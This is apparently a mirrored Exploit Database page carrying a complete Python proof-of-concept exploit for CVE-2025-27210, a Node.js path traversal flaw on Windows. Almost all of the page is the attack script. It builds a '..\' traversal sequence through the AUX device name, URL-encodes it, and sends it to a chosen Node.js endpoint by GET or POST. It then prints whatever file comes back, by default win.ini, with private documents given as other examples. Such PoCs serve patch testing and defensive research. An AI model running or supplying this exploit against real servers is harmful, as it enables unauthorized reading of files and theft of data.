NodeJS 24.x – Path Traversal

• Exploit Database
• 8 阅读

• 作者： Abdualhadi khalifa
  日期： 2025-07-16
• 类别：

  • remote
  平台：

  • nodejs
• 来源：https://www.exploit-db.com/exploits/52369/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150

  # Exploit Title : NodeJS 24.x - Path Traversal # Exploit Author : Abdualhadi khalifa # CVE : CVE-2025-27210     import argparse import requests import urllib.parse import json import sys   def exploit_path_traversal_precise(target_url: str, target_file: str, method: str) -> dict:   traverse_sequence = "..\\" * 6 normalized_target_file = target_file.replace("C:", "").lstrip("\\/") malicious_path = f"{traverse_sequence}AUX\\..\\{normalized_target_file}" encoded_malicious_path = urllib.parse.quote(malicious_path, safe='') full_url = f"{target_url}/{encoded_malicious_path}"   response_data = { "target_url": target_url, "target_file_attempted": target_file, "malicious_path_sent_raw": malicious_path, "malicious_path_sent_encoded": encoded_malicious_path, "full_request_url": full_url, "http_method": method, "success": False, "response_status_code": None, "response_content_length": None, "extracted_content": None, "error_message": None }   try: print(f"[*] Preparing precise Path Traversal exploit...") print(f"[*] Malicious Path (Encoded): {encoded_malicious_path}") print(f"[*] Request URL: {full_url}")   if method.upper() == 'GET': response = requests.get(full_url, timeout=15) elif method.upper() == 'POST': response = requests.post(f"{target_url}", params={'filename': encoded_malicious_path}, timeout=15) else: raise ValueError("Unsupported HTTP method. Use 'GET' or 'POST'.")   response_data["response_status_code"] = response.status_code response_data["response_content_length"] = len(response.content)   if response.status_code == 200: content = response.text response_data["extracted_content"] = content if target_file.lower().endswith("win.ini") and "[windows]" in content.lower(): response_data["success"] = True elif len(content) > 0:# For any other file, just check for non-empty content. response_data["success"] = True else: response_data["error_message"] = "Received 200 OK, but content is empty or unexpected." else: response_data["error_message"] = f"Server responded with non-200 status code: {response.status_code}"   except requests.exceptions.Timeout: response_data["error_message"] = "Request timed out. Server might be slow or unresponsive." except requests.exceptions.ConnectionError: response_data["error_message"] = "Connection failed to target. Ensure the Node.js application is running and accessible." except ValueError as ve: response_data["error_message"] = str(ve) except Exception as e: response_data["error_message"] = f"An unexpected error occurred: {str(e)}"   return response_data   def main():   parser = argparse.ArgumentParser( prog="CVE-2025-27210_NodeJS_Path_Traversal_Exploiter.py", description=""" Proof of Concept (PoC) for a precise Path Traversal vulnerability in Node.js on Windows (CVE-2025-27210). This script leverages how Node.js functions (like path.normalize() or path.join()) might mishandle reserved Windows device file names (e.g., CON, AUX) within Path Traversal sequences. """, formatter_class=argparse.RawTextHelpFormatter ) parser.add_argument( "-t", "--target", type=str, required=True, help="Base URL of the vulnerable Node.js application endpoint (e.g., http://localhost:3000/files)." ) parser.add_argument( "-f", "--file", type=str, default="C:\\Windows\\win.ini", help="""Absolute path to the target file on the Windows system. Examples: C:\\Windows\\win.ini, C:\\secret.txt, C:\\Users\\Public\\Documents\\important.docx """ ) parser.add_argument( "-m", "--method", type=str, choices=["GET", "POST"], default="GET", help="HTTP method for the request ('GET' or 'POST')." )   args = parser.parse_args()   # --- CLI Output Formatting --- print("\n" + "="*70) print("CVE-2025-27210 Node.js Path Traversal Exploit PoC") print("="*70) print(f"[*] Target URL: {args.target}") print(f"[*] Target File: {args.file}") print(f"[*] HTTP Method: {args.method}") print("-"*70 + "\n")   result = exploit_path_traversal_precise(args.target, args.file, args.method)   print("\n" + "-"*70) print(" Exploit Results") print("-"*70) print(f"Request URL: {result['full_request_url']}") print(f"Malicious Path Sent (Raw): {result['malicious_path_sent_raw']}") print(f"Malicious Path Sent (Encoded): {result['malicious_path_sent_encoded']}") print(f"Response Status Code: {result['response_status_code']}") print(f"Response Content Length: {result['response_content_length']} bytes")   if result["success"]: print("\n[+] File successfully retrieved! Content below:") print("" + "="*66) print(result["extracted_content"]) print("" + "="*66) else: print("\n[-] File retrieval failed or unexpected content received.") if result["error_message"]: print(f"Error: {result['error_message']}") elif result["extracted_content"]: print("\nResponse content (partial, may indicate server error or unexpected data):") print("" + "-"*66) # Truncate long content if not fully successful print(result["extracted_content"][:1000] + "..." if len(result["extracted_content"]) > 1000 else result["extracted_content"]) print("" + "-"*66)   print("\n" + "="*70) print(" Complete") print("="*70 + "\n")   if __name__ == "__main__": main()